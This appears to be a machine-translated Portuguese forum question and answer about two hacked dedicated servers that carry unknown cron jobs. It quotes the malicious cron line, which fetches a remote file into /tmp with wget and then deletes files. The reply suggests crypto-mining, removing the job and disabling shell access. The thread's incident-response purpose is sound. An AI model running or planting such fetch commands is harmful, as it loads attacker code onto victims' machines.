Posso limpar esses dois servidores hackeados com a nossa reinstalação? [duplicado]

Question

Posso limpar esses dois servidores hackeados com a nossa reinstalação? [duplicado]

#1 resposta do (1 votos)

1

Eu tenho dois servidores dedicados que alguns dias atrás começaram a me enviar notificações sobre tarefas cron desconhecidas em execução.

Em ambos os servidores eu tenho contas secundárias para meus sites e o hacker modificou o cron job para essas contas, não para root. Então eu acho que "talvez" eles tenham acesso limitado.

Ambos estão tentando executar o seguinte: cd / tmp; wget link -O link abc.txt; rm -f abc *

Saída do Cronjob do primeiro servidor: link

Saída do Cronjob do segundo servidor: link

O mais estranho é que ambos os servidores parecem hackeados ao mesmo tempo e usando o mesmo método.

Alguém teve exatamente esse tipo de hack que pode me dar idéias sobre como ele entrou e se posso removê-lo sem reinstalar ...?

Existem muitos sites nos servidores, e o primeiro usa cerca de 500 GB, o que exigiria muito para mudar para outro lugar e reinstalar.

Obrigado antecipadamente!

security hacking

por Alexandru Trandafir Catalin 16.05.2014 / 01:04

1 resposta

Tags security hacking

Acessando um vhost em uma LAN Instalando o Windows Server em um cartão compact flash

score 1 · Answer 1

Ao analisar a saída pastebin, parece que as tarefas cron estão tentando gerar hashes. Eu suspeitava que a pessoa estivesse tentando usar o servidor como parte de um pool de mineração para uma moeda criptografada.

Para detalhes sobre como ele entrou precisaríamos de vários registros e você tem 100% de certeza de que não é o dono do site quem fez isso? Você pode facilmente remover o cronjob com. crontab -e

Para evitar que a pessoa retorne, desativo o acesso ao shell para o usuário específico, se não houver motivo para isso. chsh -s /sbin/nologin {username}